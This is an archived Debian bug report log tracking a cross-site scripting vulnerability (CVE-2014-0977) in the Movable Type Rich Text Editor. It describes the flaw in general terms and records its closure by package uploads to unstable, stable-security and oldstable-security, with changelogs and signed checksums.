Debian Bug report logs - #734304
movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9 (CVE-2014-0977)

version graph

Package: src:movabletype-opensource; Maintainer for src:movabletype-opensource is Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>;

Reported by: Dominic Hargreaves <dom@earth.li>

Date: Sun, 5 Jan 2014 19:00:01 UTC

Severity: important

Tags: security

Found in version movabletype-opensource/5.2.7+dfsg-1

Fixed in versions movabletype-opensource/5.2.9+dfsg-1, movabletype-opensource/5.1.4+dfsg-4+deb7u1, movabletype-opensource/4.3.8+dfsg-0+squeeze4

Done: Dominic Hargreaves <dom@earth.li>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>:
Bug#734304; Package src:movabletype-opensource. (Sun, 05 Jan 2014 19:00:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Dominic Hargreaves <dom@earth.li>:
New Bug report received and forwarded. Copy sent to Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>. (Sun, 05 Jan 2014 19:00:06 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Dominic Hargreaves <dom@earth.li>
To: submit@bugs.debian.org
Subject: movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9
Date: Sun, 5 Jan 2014 18:44:57 +0000
Source: movabletype-opensource
Severity: important
Version: 5.2.7+dfsg-1
Tags: security

http://movabletype.org/news/2013/11/movable_type_601_529_and_5161_released_to_close_security_vul.html

DETAILS OF THE SECURITY UPDATES

The Rich Text Editor in previous versions of Movable Type 6 and Movable Type 5 are susceptible to cross-site scripting (XSS) attacks.  A remote attacker can inject JavaScript into a page or entry in a Movable Type blog or website.  This JavaScript can be executed on the client browser when that page or entry is subsequently displayed in the Rich Text Editor.

These vulnerabilities were reported by a member of the Movable Type community, and were kept confidential until the release of the updated versions of Movable Type.

5.2.9 is to be found at

http://www.movabletype.jp/downloads/stable/



Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 05 Jan 2014 19:21:12 GMT) Full text and rfc822 format available.

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 05 Jan 2014 19:21:12 GMT) Full text and rfc822 format available.

Message #10 received at 734304-close@bugs.debian.org (full text, mbox):

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 5.2.9+dfsg-1
Date: Sun, 05 Jan 2014 19:19:04 +0000
Source: movabletype-opensource
Source-Version: 5.2.9+dfsg-1

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 05 Jan 2014 19:01:02 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core
Architecture: source all
Version: 5.2.9+dfsg-1
Distribution: unstable
Urgency: low
Maintainer: Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - Well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
Closes: 734304
Changes: 
 movabletype-opensource (5.2.9+dfsg-1) unstable; urgency=low
 .
   * New upstream release
     - fixes XSS security vulnerabilities (Closes: #734304)
Checksums-Sha1: 
 9e9fb9a8ce5bfde7fdd7dbba666efd7dfd39a1c2 2241 movabletype-opensource_5.2.9+dfsg-1.dsc
 73945cd2bec6a45853a44bb02d5e8c1ed8da2f7b 7976026 movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 9cf2e4b3ca97f2743e340745e9ddd1614c33cd00 38163 movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 670654ccd01d7665663b2f8eb2bb6e38a699d67a 2996606 movabletype-opensource_5.2.9+dfsg-1_all.deb
 3462d8bae91b135a4bd8746cd28fb54e0b6992d2 632510 movabletype-plugin-core_5.2.9+dfsg-1_all.deb
Checksums-Sha256: 
 c7169602644eac5b110f74ee1c4c7d2d57b049ad728eefe910607e12b0fb3aeb 2241 movabletype-opensource_5.2.9+dfsg-1.dsc
 c15f30100210a46cdf46f5193c431ab0dce086bdae00cb3b84ba4ceb078e40cd 7976026 movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 5474178bbac12391f0bf74da0f82d2290bf5433cbdf621a18542d2f746065828 38163 movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 94c6a1d0af37cd55d5241f28070fc28d25fe9f4da521229ad6fd1e5d1b787669 2996606 movabletype-opensource_5.2.9+dfsg-1_all.deb
 311f17f80f4ae28196e44741ee00db9f71a94f29adbacf5d1fc24ac4bdc97d8e 632510 movabletype-plugin-core_5.2.9+dfsg-1_all.deb
Files: 
 540acea617cc049a8a3e85fb0e381aab 2241 web optional movabletype-opensource_5.2.9+dfsg-1.dsc
 6ec71c50c9a119aa1a971c2f6720424c 7976026 web optional movabletype-opensource_5.2.9+dfsg.orig.tar.gz
 72e3a3a83284f04acc52a86526aac3d3 38163 web optional movabletype-opensource_5.2.9+dfsg-1.debian.tar.gz
 7434beccf55ec75974f4f06e959513a7 2996606 web optional movabletype-opensource_5.2.9+dfsg-1_all.deb
 a1ea5479d7f527788cc7c03acb8c068b 632510 web optional movabletype-plugin-core_5.2.9+dfsg-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBAgAGBQJSyaxEAAoJEMAFfnFNaU+yclUQAKch05QyGKXf40CinseN8Cr0
J+LQJPaNzKiVKxRAj1GnoKlHl38D77+vszccYdUcSBl84AvNCb1q6Vb0Hd+9gYe2
UYuObl4j8qaDKKpCfSbVtEb705deFtdBsbgFAqadZgLhCi81q5rWgL385yh95/+s
M3yOHxNFlMR0O543bXxgZ4afU85dSOowUqp1lJkDRzGAr3XlYiAXbmCBPq5ZiMSU
lL+K96N1R/JWlB2tNLcoysVKEgxWB10m10fQkPWDofeqiCSTAVqlDaFpZUdn1crp
7Nb6SObJ282jx6MmtojrXQfJv4OM3/OEp8MQX7opqQALgyeEtJZCznKigQ5c6SmK
+NBN5TVcx8cPL8IKbevAUQ0i+NIXzexMpiloyMpKqfQ54I/cj1r27iEItLf9/yWO
DROxtTyqC8IfxjBJOCo+ltsJr7hUjYdGQJoZMRxPj2vfDJELfmLQ+FGk/Bky0fra
fgemFe34bhYoJiTE9oG4Lx9dHSAATJuOw9kiqjYrAaXzTWu68jTwyTI0HaeIVRRI
xnP9sAdNKXAs7UoF4orfYuh85kU1fFKkED0NNbaSU6d0btR7bD0o8NxKqFhE1MX+
Sr3cJmlw744S2g5Vd8fEUQGmS6dm/MU9u466tIaXmR3kGNNK1cwcG2gYzH+W1vz0
3kSkVXJTK1/We2BwSNBQ
=aF7w
-----END PGP SIGNATURE-----




Changed Bug title to 'movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9 (CVE-2014-0977)' from 'movabletype-opensource: XSS Security vulnerabilities fixed in 5.2.9' Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 08 Jan 2014 05:21:06 GMT) Full text and rfc822 format available.

Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 12 Jan 2014 21:21:59 GMT) Full text and rfc822 format available.

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 12 Jan 2014 21:21:59 GMT) Full text and rfc822 format available.

Message #17 received at 734304-close@bugs.debian.org (full text, mbox):

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 5.1.4+dfsg-4+deb7u1
Date: Sun, 12 Jan 2014 21:17:15 +0000
Source: movabletype-opensource
Source-Version: 5.1.4+dfsg-4+deb7u1

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 08 Jan 2014 19:42:23 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core movabletype-plugin-zemanta
Architecture: source all
Version: 5.1.4+dfsg-4+deb7u1
Distribution: stable-security
Urgency: high
Maintainer: Debian Movable Type and OpenMelody team <pkg-mt-om-devel@lists.alioth.debian.org>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - Well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
 movabletype-plugin-zemanta - Zemanta Movable Type plugin
Closes: 734304
Changes: 
 movabletype-opensource (5.1.4+dfsg-4+deb7u1) stable-security; urgency=high
 .
   * Add XSS security fixes from upstream release (CVE-2014-0977)
     (Closes: #734304)
Checksums-Sha1: 
 b27a77379c0668c288abce550b5d118076ff85bc 2342 movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 1900488ea761fea8211a2c5951d835cd7a283e2d 6237152 movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 0360440118168659d8ece33a4200822159400115 36145 movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 e29e325179347e0bb672c32775ab98c5ffc14f59 4111876 movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 2c7830661c11d12cf54c5f46be0833c7bf6777f3 170626 movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 28c954df1713ddc78b978484b14acd0af5e2bbe3 16432 movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb
Checksums-Sha256: 
 6f4f67eac43beb9d5574b5dfe2c1aa38792fac0d6ea15a8034e5f3995596a45a 2342 movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 fa649c02c5bd20d8d597af5beb97d02ff72b160a196a0de44ecbc15bf0be8398 6237152 movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 631194caaa527dc0068c795a797f1dd0f91230315e2699a44c048a6ad809644a 36145 movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 e3d1520511e0f9c740eb393448409a6f771c4ab495128d7c93c06f5324365e84 4111876 movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 bdbaa553bed44c33d65c015c410ee710193723fa51cc103c661292276297a612 170626 movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 5eba213d0da17a6f2178fbda266d37b2b7d7f2ebf67befba2c7eed9f77f7edd2 16432 movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb
Files: 
 d5b266830c218b32172914246bbca81f 2342 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1.dsc
 33f80318b618a884e0282c986edf97ea 6237152 web optional movabletype-opensource_5.1.4+dfsg.orig.tar.gz
 2dbd33e95ce4409aa477f0e0415cd0b2 36145 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1.debian.tar.gz
 095162d791ef70bdb8796bfb3342f0ee 4111876 web optional movabletype-opensource_5.1.4+dfsg-4+deb7u1_all.deb
 c7f4f0319e954da3f7da35303c9bdd83 170626 web optional movabletype-plugin-core_5.1.4+dfsg-4+deb7u1_all.deb
 6bd934f71c516424af43699ff4981592 16432 web optional movabletype-plugin-zemanta_5.1.4+dfsg-4+deb7u1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJSzaqeAAoJEMAFfnFNaU+yawoP/24upsU6W7ZPDDFgG8dwxE5r
vJY7B3jKwRz5BMUArO5o8AF6tcJy1OYO8XmiWTnNxe+pkv15efCra1vTBHqtOLQ5
sBzMZTwJlxfKEuC8j88tSYK6k+Cj9EygaWUmMnGHefy2v1d/gFjrQ8uTRzk0DO+R
Nc1gPEx7iNdddUPccqLk3woSGFh9bXJazgk50YyGJfyaV5z+56NHIPt7inhfLuGp
/reiHipEof2sr9QZq6XU/lY9NM+yY57bStMlx0OKoqCJpEZl5/G21DDwpAXuHpbQ
A3dAVJ8KOdMlyqor4PtePaOzPDvjIvUdxOFZz9L6xeEOzZvXMzOLKMiErFrPeXEy
rEPn3W6s7DeMXKS83A7wCJR11vJBfyYAF5H1L+HOsCVkEq4kNEravuz1UcLrrYgU
qsfIz1dw+MAZVCKMXukKHGq1HiJcY7iqIhTQIepNI1CuMx2k19qYeoK9dXu1cn8G
+6nvFMcXWjHw2ZiMidFFQgZCza687BEId3Q8S9If2C8raomQJudyL9PWqKQIiE7H
HmEdS3kFhFCIJTmCTX3x2FtguS8rcHp4ktiFC/YoK4gnQ3DmKUqc/zc8kAHU59Tl
fMTDEsoC9kCL3SajtD0T4GqddLdMEzjMVw4JsRSERD3oJPDXR/Y/LXalILqzBd0j
M3eYcCw0NdQS9Ctv0sny
=nauf
-----END PGP SIGNATURE-----




Reply sent to Dominic Hargreaves <dom@earth.li>:
You have taken responsibility. (Sun, 12 Jan 2014 22:06:20 GMT) Full text and rfc822 format available.

Notification sent to Dominic Hargreaves <dom@earth.li>:
Bug acknowledged by developer. (Sun, 12 Jan 2014 22:06:20 GMT) Full text and rfc822 format available.

Message #22 received at 734304-close@bugs.debian.org (full text, mbox):

From: Dominic Hargreaves <dom@earth.li>
To: 734304-close@bugs.debian.org
Subject: Bug#734304: fixed in movabletype-opensource 4.3.8+dfsg-0+squeeze4
Date: Sun, 12 Jan 2014 22:02:32 +0000
Source: movabletype-opensource
Source-Version: 4.3.8+dfsg-0+squeeze4

We believe that the bug you reported is fixed in the latest version of
movabletype-opensource, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734304@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dominic Hargreaves <dom@earth.li> (supplier of updated movabletype-opensource package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 09 Jan 2014 19:32:26 +0000
Source: movabletype-opensource
Binary: movabletype-opensource movabletype-plugin-core movabletype-plugin-zemanta
Architecture: source all
Version: 4.3.8+dfsg-0+squeeze4
Distribution: oldstable-security
Urgency: high
Maintainer: Dominic Hargreaves <dom@earth.li>
Changed-By: Dominic Hargreaves <dom@earth.li>
Description: 
 movabletype-opensource - A well-known blogging engine
 movabletype-plugin-core - Core Movable Type plugins
 movabletype-plugin-zemanta - Zemanta Movable Type plugin
Closes: 734304
Changes: 
 movabletype-opensource (4.3.8+dfsg-0+squeeze4) oldstable-security; urgency=high
 .
   * Include patch from 4.381 fixing XSS vulnerability (CVE-2014-0977)
     (Closes: #734304)
Checksums-Sha1: 
 5ac7c0f12c6458da504346b91adfcc99b65fd708 1935 movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 e64372eecb45b42aafd4e583398f00c6fa59cd5e 32804 movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 9846bd67de9587ca1dcbc5d5a52e6e1d07af83bd 2917302 movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 67978e7a830bb0a64121011aa8ca6eff25720634 172026 movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 4d3dcbf71917920ff0c82cf39c8379e5e5e22d4f 15050 movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb
Checksums-Sha256: 
 0997449a7a44da5321b2537ca5b164fd535ca11415e321486552024ccf2517d9 1935 movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 8e65e0c45bfd1e456b2d5d1add2e426008efe934cfd23dc57172388b188f3957 32804 movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 b3f32fc2e535657647f85ef8f60eac048077150d54684f52d6fe5342df7f0a7d 2917302 movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 8d500b33800cbbe16c5bc88620cdd97a8c1259fa8a7503a003ca1768cbc73a52 172026 movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 8a53f5d107ecd4b3f23cd686c326a293b3112a1accd06121875be3e4039cede4 15050 movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb
Files: 
 84b85fba984b408f3c773b88552bae66 1935 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4.dsc
 80a99093df2e5c3a8d62a00d5a5e17dc 32804 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4.diff.gz
 8420f7fd89833edfc38312fcbcd20844 2917302 web optional movabletype-opensource_4.3.8+dfsg-0+squeeze4_all.deb
 90997802071b0760c634c6478bb553f2 172026 web optional movabletype-plugin-core_4.3.8+dfsg-0+squeeze4_all.deb
 5b075f583f33955893141cece69d19b1 15050 web optional movabletype-plugin-zemanta_4.3.8+dfsg-0+squeeze4_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBAgAGBQJSzvmiAAoJEMAFfnFNaU+yW+4QAKxzOfgJhcYjUZ84CriQalc5
ndvM+AejJL4GwDWfWgAJpq0cPxdboOOmJ0RQLWOaHp5XI+XuVoUKfOFLSkL3fd6Y
Qxd/8m6wwzpcK38bjHsdudC9x42HzQcX/v9DHTJ8P2SNd+3DeknDsxsRhrfSFLBg
lSvM1NovrrjHUITk4T22nF/f7/vg9QmzjCDpowgkHyPMHaE6iPoTg6JAU5QrH+9N
4s2okoNdLVn8aAND4KRxeWRvEBGjoGnlHZXCfDZ9iSZdVXRXVmE6d+zttf2nX4aP
R/VtcSEYmxMeEO5dZtOGLcWoygQz8RaTk9ZC9RuOxpmD8F7+tiu/3IjvCew2ritI
55V0zArkDZyet1g3UBJHD6G+9y0rmWv1yOy/BfYoh+dsrVcFdpzgT6YNCVHxHmSF
tIZ7Svns+GNLEDLPuHAc+9tIySLF6WsVX50JqHKVgAUI1JviGUMxJEtkmSQi42HF
V4DEFZiffoLfqXexdpbVlnpjFt4MBJ09qVbp/yickhmL28M6xzpKEFc7ukGWI12n
5G496we9nA1w3q+oEZHqWcoWvzybVtkTW5ykb6L1tE/N/2rTIJg0s8JhShnuttVm
NF3N76IArzIiwRjvSqw0j6ps+vLBMth6NS0mU8eYEvvM1fUv6jsGI/5eZq0q507N
jqgQttUe7OiEgLUX5K0D
=W/Jx
-----END PGP SIGNATURE-----




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 10 Feb 2014 07:25:52 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 05:49:31 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.